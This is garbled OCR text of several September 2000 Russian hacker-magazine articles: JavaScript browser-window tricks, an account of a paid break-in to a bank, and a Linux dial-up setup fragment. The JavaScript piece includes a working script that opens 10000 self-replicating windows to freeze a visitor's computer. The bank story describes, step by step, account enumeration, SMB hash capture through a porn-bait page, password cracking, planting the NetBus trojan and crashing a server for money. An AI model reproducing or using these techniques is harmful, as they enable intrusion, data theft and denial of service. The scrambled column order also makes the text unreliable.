книги хакеры / журнал хакер / 021_compressed
.pdf50 |
0032 |
31337/ВЗЛОМ |
|
|
> CЕНТЯБРЬ ‘ Y2K |
|
|
||||
|
ЗАПАДЛО НА ЯВЕ
Алексей Масанов (amasanov@hotmail.com)
|
|
Внимай, даю установку: скрипты - это круто. Ты |
window.resizeTo(screen.width/2,screen.height/2); |
цикла, то окно так и будет безостановочно бе- |
|
|
|
|||||||
|
|
это знаешь, я это знаю, короче - мы это знаем. |
// Сначала сжимаем окно до //половины ра- |
гать по экрану. Попытка же свернуть его через |
|
|
||||||||
|
|
Установку дал! Успешно. Теперь о них - люби- |
бочего стола |
|
task manager приведет к интересным визуаль- |
|
|
|||||||
|
|
мых скриптах - и поговорим. Приятно наваять |
|
window.moveTo(1,1); // Теперь помещаем |
ным эффектам (советую убедиться на собствен- |
|
|
|||||||
|
|
своими ручками какую-нибудь скриптятину на |
его в левый верхний угол экрана |
ном опыте). Если ты хочешь, чтобы цикл выпол- |
|
|
||||||||
|
|
яве и дать соседу-ламаку пропереться, а пока |
|
var x=1; // Это будет наша X- |
координата. |
нялся определенное количество раз, замени |
|
|
||||||
|
|
тот будет ее разглядывать - дать ему |
пинка. Вот |
Вначале равна единице |
|
оператор while |
на while(var i < твое число) и до- |
|
|
|||||
|
|
только бага: по ходу все клевое в |
скриптинге |
|
var y=1; // Это будет наша Y- |
координата. |
бавь в конце |
цикла оператор i++ (см. пример |
|
|
||||
|
|
|
|
|||||||||||
|
|
уже придумано. Предложить что-либо карди- |
Вначале равна единице |
|
N3). |
|
|
|
|
|
|
|||
|
|
нально новое (во всяком случае, мне) уже слож- |
|
var dx=7; // Смещение по X |
|
С помощью |
метода resizeTo можно делать до- |
|
|
|||||
|
|
но, лучше пива попить пойти. С другой стороны, |
|
var dy=10; // ... è ïî Y |
|
вольно любопытные вещи. Посмотри, как можно |
|
|
||||||
|
|
можно легко насочинять целый ворох вторичных |
|
move(); // Теперь вызываем функцию, кото- |
сжать окно до размеров заглавной рамки и зас- |
|
|
|||||||
|
вещей, которые при ближайшем рассмотрении |
рая и будет двигать окно |
тавить все это, как обычно, бегать по экрану: |
|
|
|||||||||
|
|
сведутся к нагромождению все тех же базовых |
function move(){ // Объявляем функцию |
|
|
|
|
|
|
|
||||
|
|
методов. А это неправильно - вторичное само по |
|
while(true){ // Объявляем бесконечный |
|
|
|
|
|
|
|
|||
|
себе на хрен никому не нужно. |
|
öèêë |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
Наконец (не на конец, а в конце концов!), насту- |
if(x>=(screen.width) || x<=0) dx=-dx; // Åñëè îê- |
|
|
|
|
|
|
|
|||||
|
|
пило “творческое озарение”: если нельзя ничего |
но на краю экрана по X, //меняем направление |
|
|
|
|
|
|
|
||||
|
|
выжать внутри документа, то надо переходить |
|
if(y>=(screen.height) || y<=0) dy=-dy; // Òî |
|
|
|
|
|
|
|
|||
|
|
на качественно новый уровень манипуляции са- |
же самое, но уже для Y |
|
|
|
|
|
|
|
||||
|
мим окном броузера. |
|
|
x+=dx; // Сдвинули по горизонтали |
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|||||
|
|
Сначала чуть-чуть информации для тех, кто за- |
|
y+=dy; // ... и по вертикали |
|
|
|
|
|
|
|
|||
|
áûë (èëè íå çíàë): |
|
|
window.moveTo (x,y); // Нарисовали окно |
|
|
|
|
|
|
|
|||
|
В объектной модели современных броузеров |
на новом месте |
|
|
|
|
|
|
|
|
||||
|
|
(под современными я имею в виду Internet |
} // Конец нашего бесконечного цикла |
|
|
|
|
|
|
|
||||
|
|
Explorer 4.0 è âûøå è Netscape Navigator õîòÿ áû |
} // Конец функции move |
Скрипт 2: Развитие темы |
|
|
|
|
||||||
|
|
4.x) есть два очень интересных метода: win- |
} // Конец функции move_the_window |
|
|
|
|
|
|
|
||||
|
|
dow.resizeTo (x,y) è window.moveTo (x,y), êîòî- |
// Ну, и закрываем script блок |
<script language = javascript> // Начинаем script |
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
рые сулят просто огромные возможности. Пер- |
</script> |
áëîê |
|
|
|
|
|
|
||||
|
|
вый метод изменяет размер “смотрового окна” |
<html> |
|
function move_the_windows(){ // Íàøà |
стартовая |
|
|
||||||
|
|
|
|
|||||||||||
|
|
броузера до указанных размеров (т.е. x на y пик- |
<head> |
функция |
|
|
|
|
|
|||||
|
селей), а второй перемещает само окно, поме- |
|
|
|
|
|
|
|
|
|
|
|||
|
<title>Script N1</title> |
window.resizeTo(screen.width, |
25); // |
Сжимаем |
|
|
|
|||||||
|
|
щая левый верхний угол в точку с координатами |
</head> |
окно номер 1 |
|
|
|
|
|
|
||||
|
|
x по горизонтали и y по вертикали. Таким обра- |
<body onload = “move_the_window()”> |
window.moveTo(0,1); // |
Теперь |
помещаем |
|
|
|
|||||
|
|
зом, грамотно используя эти два метода, ты |
<center><font face = Times size = 6 color |
его в левый верхний угол экрана |
|
|
|
|
||||||
|
|
легко можешь добиться весьма интересных |
=red><i>JavaScript is cool!</i></font></cen- |
window2 = open(“”, null); // Создаем |
объект |
|
|
|
||||||
|
|
эффектов, которые буквально валят с ног непод- |
ter> |
второго окна |
|
|
|
|
|
|
||||
|
|
готовленного зрителя. |
</body> |
window2.document.write(“<title> |
Window |
|
|
|||||||
|
|
Для начала давай рассмотрим простенький |
</html> |
N2</title>”); // Пишем в него заголовок |
|
|
|
|
||||||
|
|
скриптик, отвечающий за перемещение окна |
|
|
|
|
window2.resizeTo(screen.width,25); |
// Ñæè- |
|
|
|
|||
|
броузера по десктопу и его отражение от |
Как только страница полностью загружена, вы- |
ìàåì åãî è |
|
|
|
|
|
|
|||||
|
|
“краев” экрана: |
зывается функция move_the_window. Она объяв- |
window2.moveTo(0, screen.height-25); // ïî- |
|
|
||||||||
|
|
|
|
ляет все необходимые переменные и помещает |
мещаем в низ экрана |
|
|
|
|
|
||||
|
|
Скрипт 1: Окно в стиле Xonix |
окно в левый верхний угол рабочего стола. Ме- |
var dy1=2; // Начальное смещение для вер- |
|
|
||||||||
|
|
|
|
тоды screen.width и screen.height возвращают |
хнего окна |
|
|
|
|
|
|
|||
|
|
<script language = javascript> // Начинаем script |
нам значения (ширину и высоту) рабочего стола, |
var dy2=-2; // ... и для нижнего |
|
|
|
|
||||||
|
|
áëîê |
|
и, уже зная их, мы сжимаем окно до половины. |
var y1 = 1; // Y-координата верхнего окна |
|
|
|||||||
|
|
function move_the_window(){ // Наша стартовая |
Теперь приступим к функции move. Т.к. все дей- |
var y2 = screen.height-25; // è Y-координата |
|
|
||||||||
|
|
функция |
ствия здесь выполняются внутри бесконечного |
нижнего |
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
31337/ВЗЛОМ |
|
|
|
0033 |
|
51 |
||||||||
|
|
|
> CЕНТЯБРЬ ‘ Y2K |
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|||||||||||||
|
|
|
move(); // Теперь вызываем функцию, кото- |
рые движутся независимо. Обрати внимание на |
window.open(“script3.htm”); // Новое окно с |
|
|
|||||||||||
|
|
|
рая и будет двигать оба окна |
механизм создания второго окна и способ запи- |
ссылкой на тот же HTML файл |
|
|
|||||||||||
|
|
|
function move(){ // Объявляем функцию |
си HTML-тэгов через document.write. |
i++; // Увеличиваем счетчик цикла |
|
|
|||||||||||
|
|
|
while(true){ // Объявляем бесконечный цикл |
Теперь, познакомившись с этими методами, ты, |
} // Конец цикла |
|
|
|
|
|
|
|
||||||
|
|
|
if (y1>=(screen.height) || y1 <=0) dy1=-dy1; // |
наверно уже задаешь себе вопрос: а нельзя ли |
} // Конец generate_windows |
|
|
|||||||||||
|
|
|
Меняем направление |
через этот самый JavaScript подвесить клиен- |
// Закрываем script блок |
|
|
|
|
|||||||||
|
|
|
if (y2>=(screen.height) || y2 <=0) dy2=-dy2; |
тский компьютер? Что ж, это вполне возможно. |
</script> |
|
|
|
|
|||||||||
|
|
|
// То же для второго окна |
Метод прост до неприличия: все, что только |
<html> |
|
|
|
|
|||||||||
|
|
|
y1+=dy1; // Сдвинули первое окно по вер- |
нужно делать, - открывать новые окна с макси- |
<head> |
|
|
|
|
|||||||||
тикали |
|
|
|
|
мальной быстротой. В этом случае у системы |
<title>Multiple windows</title> |
|
|
||||||||||
|
|
|
y2+=dy2; // ... и второе |
просто не хватает ресурсов, и все “повисает”. |
</head> |
|
|
|
|
|||||||||
|
|
|
window.moveTo (0,y1); // Нарисовали первое |
Другое дело, что, на мой взгляд, этот примити- |
<body onload = “generate_windows()”> |
|
|
|||||||||||
окно на новом месте |
|
|
|
|
визм не является чем-то по-настоящему инте- |
</body> |
|
|
|
|
|
|
|
|||||
|
|
|
window2.moveTo (0,y2); // |
Нарисовали вто- |
ресным, и, вероятно, раз ознакомившись с этим |
</html> |
|
|
|
|
|
|
|
|||||
рое окно на новом месте |
|
|
|
|
дубовым методом, ты больше не будешь тра- |
|
|
|
|
|
|
|
|
|||||
} // Конец нашего бесконечного цикла |
|
|
тить свое время на эту муру: |
Фактически в теле |
главного цикла скрипт про- |
|
|
|||||||||||
|
|
|
} // Конец функции move |
|
|
|
бует открыть 10000 |
окон, причем каждое окно |
|
|
||||||||
|
|
|
} // Конец функции move_the_windows |
|
|
|
ссылается на тот же |
файл, т.е. в свою очередь |
|
|
||||||||
|
|
|
|
|
|
|
|
|||||||||||
|
|
|
// Ну, и закрываем script блок |
|
|
|
пытается открыть еще |
10000 окон и т.д. Систе- |
|
|
||||||||
|
|
|
</script> |
|
|
|
ма просто не справляется с таким потоком и, |
|
|
|||||||||
|
|
|
<html> |
|
|
|
увы, повисает. |
|
|
|
|
|
|
|
||||
|
|
|
<head> |
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
<title>Script N2 Window 1</title> |
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
</head> |
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
<body onload = “move_the_windows()”> |
|
|
Скрипт 3: Генерация множес- |
|
|
|
|
|
|
|
|
||||
|
|
|
<center><font face = Times size = 6 |
|
color |
òâà îêîí: |
|
|
|
|
|
|
|
|
|
|
||
|
|
|
=red><i>JavaScript is cool!</i></font></cen |
|
- |
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
ter> |
|
|
<script language = javascript> // Начинаем script |
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
</body> |
|
|
áëîê |
|
|
|
|
|
|
|
|
|
|
||
|
|
|
</html> |
|
|
function generate_windows(){ // Наша стартовая |
Ну, пора постепенно закругляться. Если у тебя |
|
|
|||||||||
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
функция |
есть какие-то вопросы / пожелания / дополне- |
|
|
|||||||
|
|
|
По сути этот скрипт является расширением пер- |
var i=1; |
íèÿ - ïèøè. |
|
|
|
|
|||||||||
|
|
|
вого: новым является наличие двух окон, кото- |
while (i < 10000){ // Главный цикл |
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
52 0034 |
31337/ВЗЛОМ |
> СЕНТЯБРЬ ‘ Y2K |
Áàíê â ïîçå Ðàêà
X-KoDeX (root@hackers-paradise.com)
Как и всякий автор, начну повествование о взломе достаточно банально: как все начиналось, откуда все пришло? Все началось несколько лет назад, когда на одной тусовке, не без сильных объятий Змия, я как-то сболтнул, что защита некоторых серверов настолько мала, что при определенном желании можно даже хакнуть святую святых - банки, подклю- ченные к Инету. Озвучив эту мысль бухим корефанам, через некоторое время я осуществил эту идефикс на одном из “хранителей сбережений”. История абсолютно реальна и не является фикцией а-ля Ситибанк с Владимиром Левиным в главной роли.
|
|
|
произойти сделка на оч-ч-ч-чень круглую (даже |
дильником :). На покупку железного друга ушло |
|
Заказ |
|
по мировым меркам) сумму. А где большие сум- |
полчаса и еще два дня на протягивание ISDN ли- |
||
|
|
|
мы, там и законное желание не потерять их ;). В |
нии (наконец-то у нас провы научились это пре- |
|
|
Ломать банки - не аккаунты и аськи тырить: я |
данном случае заказчик хотел убедиться в пла- |
доставлять более-менее быстро). Кого интере- |
||
|
взялся за разработку не только из-за “чистой |
тежеспособности предполагаемого партнера не |
сует - комп был почти стандартный, разве что |
||
|
èäåè õàêà” (õîòÿ îíà |
имела место быть), но и по |
только по официальным документам налоговой |
выделялся наличием упса - UPS 400VA (куда ж |
|
|
причине отсутствия |
наличия буказоидов. Осо- |
инспекции, но и по так называемой РЕАЛЬНОЙ |
без него, родного-то, в такое пекло?). |
|
бенно порадовал тот |
момент, что заказчик поо- |
бухгалтерии, а не той, что мелькает в отчетах |
На установку и настройку |
WinNT Server |
|
|
бещал заплатить за |
успешное выполнение “за- |
налоговиков. Т.е. была нужна закрытая инфа, |
4.0/FreeBSD 4.0 с необходимым |
софтом ушел |
|
дания” (он ТАК это |
называл) - $5000. Помимо |
находящаяся в базе данных “заказанного” бан- |
åùå äåíü. |
|
наличных грин, было |
гарантировано покрытие |
ка, а конкретно - на винте банковского сервера. |
Теперь я перевел мутный взгляд с |
пустой бутыл- |
|
всех необходимых трат. |
Заказ был принят и понят. Из исходных данных |
ки из-под “Балтики ¹3” на месторасположение |
|||
|
С заказчиком мы познакомились совершено |
стало известно лишь название банка. Были |
банка в Сети. |
|
|
|
случайно. Хотя, впоследствии, я потерял уве- |
обозначены сроки: “как можно скорее”. Переве- |
За 15 минут с помощью http://www.ripn.net ïó- |
||
|
ренность в случайности всего происходящего |
дя это на русский язык, стало понятно, что у ме- |
тем перебора всевозможных названий, комби- |
||
|
(хотя это и понятно, в России живем, Господа). |
ня есть месяц на разработку. |
наций и аббревиатур был получен диапазон IP- |
||
|
Заказчик стал невольным свидетелем моего |
|
адресов, выделенных РОСНИИРОС’ом для рас- |
||
|
разговора с Unix-админом об особенностях |
Подготовка |
сматриваемого банка. Вскоре узнал IP-адрес |
||
|
FreeBSD. Через некоторое время после этого |
|
сервера, на котором были установлены сервисы |
||
была назначена встреча с заказчиком. Встрети- |
По всей сути кампании я понимал, что буду ра- |
почты, ftp, news и т.д., в общем, был найден |
|||
|
лись. Поговорили. Стала понятна суть: пред- |
ботать один. Поэтому пришлось во многом по- |
сервак, подключенный к Сети. Я немного уди- |
||
|
стоит проникать в нечто крупное и денежное. |
суетиться в подготовке. Деньги на расходы |
вился тому факту, что из 15 выделенных адре- |
||
|
Приняв заказ, мы договорились встретиться |
(съем квартиры; покупку оборудования; выделе- |
сов использовался только один. Было понятно, |
||
|
вторично для разъяснения более конкретных об- |
ние канала в Инет) я получил сразу же после об- |
что работа предстоит тяжелая. |
||
|
стоятельств. Суть всей его идеи состояла в сле- |
суждения всех деталей. В течение трех дней я |
Загрузился во FreeBSD, откомпилил scan.c |
||
|
дующем: между двумя банками должна была |
снял однокомнатную квартиру с большим холо- |
(#gcc -o scan scan.c, более подробно про рабо- |
> СЕНТЯБРЬ ‘ Y2K
ту с юникс-эксплойтами и компиляцию из WIN |
серваке, прителнетившись к ним. Если это win- |
ты можешь прочитать прямо в этом номере), за- |
сервис, то ясен перец - это win-система, если |
пустил с консоли. Сканирование из-под unix`a |
*nix-сервис, то сие *nix (железная логика =). |
было выбрано из соображений безопасности и |
|
моих личных предпочтений. Хотя можно было |
|
бы обойтись обычным виндозным сканером |
|
вроде Iptools |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
И это банковский сервер с |
выходом в Internet! |
|
|
|
Взлом |
|
|
|
|
|
Перво-наперво надо было найти логин админа, |
||
|
|
|
|||
|
|
|
|
т.к. обычно, руководствуясь рекомендациями |
|
|
или более маленьким и быстрым девайсом |
|
Микрософта, стандартное “Administrator” заме- |
||
|
NetGhost PortScan. |
|
няют чем-то другим. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Неплохой выбор портсканов на http://www.data- |
|
|
|
|
|||
|
tone.com/mirrors/xiaomu/WWW/winsock/win95/ipu |
|
|
|
|
|||
|
til.htm, а IP tools ты можешь слить с их офи- |
|
|
|
|
|||
|
циального сайта http://ks-soft.mastak.com/use- |
|
|
|
|
|||
|
rs/kssoft/ip-tools.eng/index.htm. Короче, проска- |
|
|
|
|
|||
|
нил я сервер банка на открытые порты, читай |
|
|
|
|
|||
|
установленные сервисы. |
|
|
|
|
|
|
|
|
От результата немножко офигел! Открыто все, |
|
|
|
|
|||
|
что можно открыть: 10, 21, 23 (зачем на NT’е |
|
|
|
|
|||
|
телнет-сервер я так и не понял), 25, 53, 110, |
|
|
|
|
|||
|
137, 138, 139, 143, 443. По открытым 137, 138, |
|
Но в Win32 API существует пара функций, позво- |
|||||
|
139 стало понятно, с какой ОС мы имеем дело. |
|
ляющих узнать этот логин. МелкоМягкие ребята |
|||||
|
Сие было, конечно |
æå, NT. Netcraft (www.net- |
|
и здесь о нас позаботились. :) Это |
||||
|
craft.com со скриптом What’s that site running?) |
|
LookupAccountName è LookupAccountSid (SID - |
|||||
|
это подтвердил. |
|
security identifier - идентификатор безопаснос- |
|||||
|
|
|
|
|
|
ти). Две небольшие программки отечественного |
||
|
|
|
|
|
|
автора (user2sid и sid2user) ты найдешь в Сети |
||
|
|
|
|
|
|
по адресу http://www.chem.msu.su/~rudnyi/NT/. |
||
|
|
|
|
|
|
Там же есть исходники. |
||
|
|
|
|
|
|
В командной строке набираю: |
||
|
|
|
|
|
|
>user2sid \\[ip-адрес сервера] “Power users” |
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Также для определения типа ОС я мог бы прос- |
Выдало примерное следующее: S-1-2-34-(на- |
|
то посмотреть какие демоны/сервисы висят на |
бор цифр)-(набор цифр)-(набор цифр)-512 |
|
|
|
|
ÂПРОДАЖЕ
Ñ15 СЕНТЯБРЯ
ЧИТАЙТЕ В 18(75) НОМЕРЕ
«СТРАНЫ ИГР»
Революция в «Стране Игр»!
Новая ступень в развитии вашего любимого журнала:
Новая система оценок! Новые рубрики!
Новый CD! Наконец-то! Новый БОЛЬШОЙ постер формата A2 в каждом журнале
ñдиском! Никаких дырок
èскрепок!
Все это вы сможете увидеть, потрогать, запустить, повесить на стенку и даже почитать 15 сентября!
Этот день вы запомните надолго.
|
31337/ВЗЛОМ |
|
|
|
|
54 |
0036 |
|
|
> СЕНТЯБРЬ ‘ Y2K |
|
|
|
Так как у администратора RID (relative identifeir - |
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
||||
относительный идентификатор) постоянный и |
|
|
|
|
|
|
|
|
|||
равен 500 (как у root’a “0”), то |
|
|
|
|
|
|
|
|
|||
>sid2user \\[ip-адрес сервера] 2 34 (набор |
|
|
|
|
|
|
|
|
|||
цифр) (набор цифр) (набор |
|
|
|
|
|
|
|
|
|
|
|
öèôð) 500 |
|
|
|
|
|
|
|
|
|
|
|
// (набор цифр) - |
это выдавались номера ведом- |
|
|
|
|
|
|
|
|
||
ства и подразделений, |
|
|
|
|
|
|
|
|
|
|
|
//тогда я их, естественно, не записал, а сейчас |
|
|
|
|
|
|
|
|
|||
Остальное было делом техники |
и времени. |
|
|
|
|
|
|||||
не вспомню :). |
|
|
|
||||||||
Name is GOD (ну когда они на землю спустят- |
|
|
|
|
|
|
|
|
|
||
ñÿ???) |
|
|
|
|
|
|
|
|
|
||
Domain is ****bank |
|
|
|
|
Ñëàë |
похотливому админу письма каждую ночь, |
|||||
Type of SID is SidTypeUser |
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
и, наконец, он через 3 дня зашел на “крутой |
|||
Часть дела была сделана. Теперь надо было зас- |
|
|
|
|
|
порносервер”. Там он |
увидел надпись “Sorry, |
||||
тавить тупую NT’ю отдать пароль :). После неко- |
|
|
|
|
|
Under Construction” è, |
наверное, в расстроенных |
|
|||
торых раздумий сделал следующее: |
|
|
чувствах ушел по ссылке |
из другой рассылки :). |
|
||||||
Поставил у себя Веб-сайт, в htdocs сделал ди- |
|
|
|
|
|
Но хешированный пароль по DES’у я все-таки |
|||||
|
|
|
|
получил :). Этот глюк SMB-протокола пришелся |
|||||||
ректорию images и зашарил ее на полный дос- |
|
|
|
|
|
||||||
туп Everyone. Туда кинул image.jpg, сделал на |
|
|
|
|
|
мне на руку (как и многие другие, и не только |
|||||
|
|
|
|
|
|||||||
скорую руку типа “порно сервер” (Админы любят |
|
|
|
|
мне ;). L0phtCrack расшифровал пароль почти за |
||||||
шляться по ентим штукам :). Затем в index.html |
Я “создал” |
мыльную порно рассылочку о крутых сутки (пароль был непростой). |
|||||||||
вставил такую “ссылочку” file:////3282120- |
телках, больших сиськах и т.д.. |
|
|
||||||||
165/images/image.jpg. Далее был установлен и |
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
||||
включен сниффер (SpyNet 3.12). |
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Дальше в “Computer Search” ввожу \\[ip-адрес сервера],
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
В сниффере были |
выставлены 137, 138, 139 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
порты на слежение. |
|
|
|
|
|
присоединяюсь, ввожу login/passwd и получаю |
|||
|
|
|
|
|
|
доступ к “административным” шарам ($), а так- |
|||
|
|
|
|
|
|
же к шарам всей локальной сети. После деталь- |
|||
|
|
|
|
|
|
||||
|
|
|
|
|
|
ного изучения локалки пришло невкусное разо- |
|||
|
|
|
Адрес, конечно же, оставил http://3282120165. |
чарование: нужной заказчику информации не |
|||||
|
|
|
Такой линк был получен в результате обработки |
оказалось. Но был обнаружен еще один внут- |
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
стандартного IP-адреса. Про это Х писал в ¹9 |
ренний сервер (видимо, именно тот, который |
|||||
|
|
|
за 99. То же можно сделать с помощью проги, |
мне был нужен). Там уже стояла FreeBSD 3.3.1. |
|||||
|
|
|
получившей известность в “Шароварах” - Ipalt, |
Немного прикинув и понадеясь на удачу (а она |
|||||
|
|
|
которую можно взять по адресу http://www.ffh- |
нужна была трижды), заливаю на NT’ю Сетевого |
|||||
|
|
|
lab.com/Products/products.html. |
Паровоза 2.0 aka NetBus 2.0, |
|
|
|
31337/ВЗЛОМ |
|
|
|
|
> СЕНТЯБРЬ ‘ Y2K |
0037 |
55 |
|
|
|
|
|
|
|
|
|
|
|
|
соединился с сервером NetBus`a (ну как можно |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
не ставить антивирусы???). Следующей ночью |
|
|
|
|
|
|
|
|
|
|
|
запускаю с сервера telnet и начинаю удивляться |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
крутости админов банковского сервера! Полови- |
|
||
|
|
|
|
|
|
|
|
|
на аккаунтов, прописанных в NT’e (кстати, логи- |
|
|
|
|
|
|
|
|
|
|
|
ны оригинальные: ban_comp1, ban_comp2, |
|
|
|
|
|
|
|
|
|
|
|
ban_term1, ban_term2 , etc :), совпадают с заре- |
|
|
|
|
|
|
|
|
|
|
|
генными на юнихе. Тут даже не нужен был root, |
|
|
|
|
|
|
|
|
|
|
|
чтобы достать интересующую информацию. |
|
|
|
|
|
|
|
|
|
|
|
Такая вот история. Буказоиды я получил. Все |
|
|
|
|
|
|
|
|
|
|
|
вроде довольны. Ничего вроде сверхъестес- |
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
твенного нет, просто убивает наличие таких дыр |
|
||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
è ïîä óòðî |
вешаю сервер ExploitGenerator’ом. |
|
в святая святых. |
|
|
||
|
|
|
|
|
|
|
|
|
Это не руководство - это мои мысли. И если ты |
|
|
|
|
|
|
|
|
|
|
|
личность, то МЫСЛИ! Здесь есть о чем призаду- |
|
|
|
|
|
|
|
|
|
|
|
маться. |
|
|
|
|
|
|
|
|
|
|
|
При проведении всей операции была использо- |
|
|
|
|
|
|
|
|
|
|
|
вана информация с сайтов http://www.ntbug- |
|
|
|
|
|
|
|
|
|
|
|
traq.com/, |
http://www.cert.org, |
|
|
|
|
|
|
|
|
|
|
http://www.ciac.org |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
P.S. Если ТОТ банк думает, что это не про НЕГО, |
|
|
|
|
|
|
|
|
|
|
|
то пусть ПОDOOMАЕТ. А админов увольнять на- |
|
|
|
|
|
|
|
|
|
|
|
до, IMHO, раскормили себе жирные задницы и |
|
|
|
|
|
|
|
|
|
|
|
ни фига не делают мозгом. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Весь боевой софт, описанный в этой статье, |
|
|
|
|
|
|
|
Сервак ребутится, запуская из win.ini |
серверную |
|
можно скачать по адресу www.hackers-para- |
|
||
|
|
|
прописываю его в win.ini |
|
часть трояна. На этот раз мне повезло! Клиент |
|
dise.com . |
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
56 |
0038 |
31337/ЮНИКСОИД |
|
|
> СЕНТЯБРЬ ‘ Y2K |
|
|
|
|
|
|
|
|||||
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Сделай ЭТО в Linux!
Юрий Семенов (avoid@mail.ru)
àÿ.
ãî
å
í-
-
é
ñ-
-
è-
ð
àÿ
-
-
î-
-
-
ÿ
à
îò-
è
|
|
всю жизнь. Каждый день |
Domen: |
|
tsu.ru |
|
|
|
|
|
|||||
|
|
открывать новые фи- |
|
|
|
|
|
|
|
|
|
|
|||
|
|
разбирать кернеловые |
и, конечно, большой список телефонов. |
|
|
|
|
|
|||||||
|
|
если... если не выбрать |
Теперь, как рекомендует Вындоз, “можно откинуться |
|
|
|
|
|
|||||||
|
|
“чекпоинт”, одним словом, |
на спинку стула” и начать править |
разные скрипты и |
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|||||||||
|
|
говорить: “Я пользователь |
файлы. Сразу скажу, что я не буду |
разжевывать наз- |
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
начение каждой опции. Все будет ограничиваться |
|
|
|
|
|
|
|||
|
|
чекпоинтом для прос- |
прямой функциональной нуждой. Если же кому-то |
|
|
|
|
|
|
||||||
|
|
Линух, работающего на |
нужны подробности, то он может найти их сколько |
|
|
|
|
|
|
||||||
|
|
может быть установка Ин- |
угодно, например, в романе Толстого “Война и мир”... |
|
|
|
|
|
|
||||||
|
|
“А как же русифика- |
%) |
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
... Ну, извините! А может |
Прежде всего, следует “расфасовать” всю провайде- |
|
|
|
|
|
|||||||
|
|
поставить нажатие кнопки |
ровскую инфу по соответствующим файлам, чтобы |
|
|
|
|
|
|||||||
|
|
|
|
|
|
система могла их найти и конкретно поюзать. IP DNS |
|
|
|
|
|
||||
|
|
по модему из Linux - |
следует сразу запихать в файл /etc/resolv.cfg, который |
|
|
|
|
|
|||||||
|
|
что попутно придется и |
должен выглядеть следующим образом: |
|
|
|
|
|
|||||||
|
|
è |
хард настраи- |
domen |
tsu.ru |
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
||||||
|
|
скрипты править, да и с |
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
||||||
|
|
настройками |
знако- |
nameserver |
212.192.100.1 |
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|||||||
|
|
- полный арсенал, ко- |
Конечно, совсем не обязательно загромождать тра- |
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|||||||||
|
|
Тем более, делать это |
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|||||||||
|
|
придется не за просто так |
фик просьбами расшифровать “weather.yahoo.com”. |
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|||||||||
|
|
тут пахнет реальной |
Его IP вряд ли изменится за 1-2 дня. На такой случай |
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|||||||||
|
|
экономией |
денег! Вот, |
в Linux предусмотрено ведение собственной базы |
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
||||||||
|
|
например, |
Вындозе |
DNS. Она хранится в файле /etc/hosts, который имеет |
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|||||||||
|
|
ваще побоку, |
÷òî òû |
следующую структуру: |
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|||||||||
|
|
коннектишся с плат- |
127.0.0.1 |
|
localhost |
|
|
|
|
|
|||||
|
|
íûì |
провайдером. |
|
|
|
|
|
|
||||||
|
|
|
|
|
